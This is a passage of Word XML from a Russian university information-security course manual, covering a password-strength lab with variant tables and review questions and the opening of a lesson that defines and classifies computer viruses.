          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="609600" cy="182880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38" name="Рисунок 38" descr="Y:\4_complate\бакалавры\+Информационная безопасность(Люля)\course\resources\CoursePreview\lab.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4_complate\бакалавры\+Информационная безопасность(Люля)\course\resources\CoursePreview\lab.files\image066.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:link="rId100">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="609600" cy="182880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>RANDOMIZE – сбрасывает начальное состояние датчика случайных чисел случайным образом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>CHR(X) – возвращает символ с ASCII кодом X. Коды различных групп символов приведены ниже.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Коды символов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Коды английских символов : «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>»=65,…,«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r>
        <w:t>»=90, «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>»=97,…, «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t>» =122.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Коды цифр : «0» = 48, «9» = 57.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>! - 33, “ – 34, # - 35, $ - 36, % - 37, &amp; - 38, ‘ – 39, ( - 40, ) – 41, * - 42.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Коды русских символов : «А» - 128, … «Я» - 159, «а» - 160,…, «п» - 175, «р» - 224,…, «я» - 239.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Таблица 1 – Варианты заданий лабораторной работы</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9309" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1105"/>
        <w:gridCol w:w="1176"/>
        <w:gridCol w:w="1411"/>
        <w:gridCol w:w="1104"/>
        <w:gridCol w:w="1104"/>
        <w:gridCol w:w="1175"/>
        <w:gridCol w:w="1411"/>
        <w:gridCol w:w="1104"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1237" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568"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both"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB0648">
              <w:t>№</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:pStyle w:val="af4"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB0648">
              <w:t>в-та</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="593"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rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2242"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rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="double" w:sz="12"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rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605"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t>№</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:pStyle w:val="af4"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB0648">
              <w:t>в-та</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="582"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rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2211"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rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1232" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12"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rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>T</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 недели</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16</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 месяц</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17</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недели</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3</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5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18</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11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дней</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lastRenderedPageBreak/>
              <w:t>4</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11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6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19</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100 паролей/день</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дней</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5</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100 паролей/день</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12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20</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паролей/день</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 неделя</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6</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паролей/день</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 месяц</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21</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 недели</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7</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недели</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22</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дней</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8</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23</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5 дней</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9</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24</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6 дней</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 неделя</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25</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11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12 дней</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11</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11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 недели</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26</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100 паролей/день</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 месяц</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12</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100 паролей/день</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27</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паролей/день</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недели</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13</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паролей/день</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5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28</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дней</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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14</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6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29</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дней</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568"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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="593" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12"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42" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12"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паролей/мин</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12"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12 дней</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="582" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12"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11" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12"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паролей/мин</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1232" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12"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 неделя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вопросы для выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Чем определяется стойкость подсистемы идентификации и аутентификации?</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Перечислить минимальные требования к выбору пароля.</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Перечислить минимальные требования к подсистеме парольной аутентификации.</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вопросы и задания для защиты  работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Как определить вероятность подбора пароля злоумышленником в течении срока его действия?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Выбором каким параметров можно повлиять на уменьшение вероятности подбора пароля злоумышленником при заданной скорости подбора пароля злоумышленником и заданном сроке действия пароля?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Содержание отчета и его форма</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполнение задания с оценкой является заключительным действием обучаемого с системой. Индивидуальные задания выдаются преподавателем согласно по вариантам, согласно порядковому номеру по журналу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc3811329"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve">Практическое занятие </w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Исследование типов вредоносного ПО</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель работы:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Научиться определять первые признаки появления комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ютерных вирусов. Ознакомиться с основными видами антивирусных программ. Узнать принцип роботы основных антивирусных программ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>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color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Компьютерным вирусом</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – называется специально написанная программа способная приписывать себя к другим программам, создавать свои копии и п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мещать их в файлы, системные области диска и в вычислительные сети с целью нарушения работы системы файлов и каталогов, создания всевозможных помех в работе на компьютере.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вирусы принято классифицировать:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. По среде обитания:</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сетевые вирусы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (они распространяются по разным компьютерным с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тям);</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файловые вирусы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (заражают исполняемые файлы программ – com, exe, bat.);</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загрузочные вирусы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (заражают загрузочный сектор диска (boot-sector) или сектор, содержащий программу загрузки системного диска – Master Boot Record);</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файлово-загрузочные</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (действуют так же как и загрузочные вирусы)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. По способу заражения:</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резидентные</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (такой вирус при инфицировании ПК оставляет в опер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тивке свою резидентную часть, которая потом перехватывает обращение ОС к объектам заражения и поражает их. Резидентные вирусы живут до первой пер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>загрузки ПК);</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нерезидентные</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (не заражают оперативную память и могут быть акти</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ными ограниченное время)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
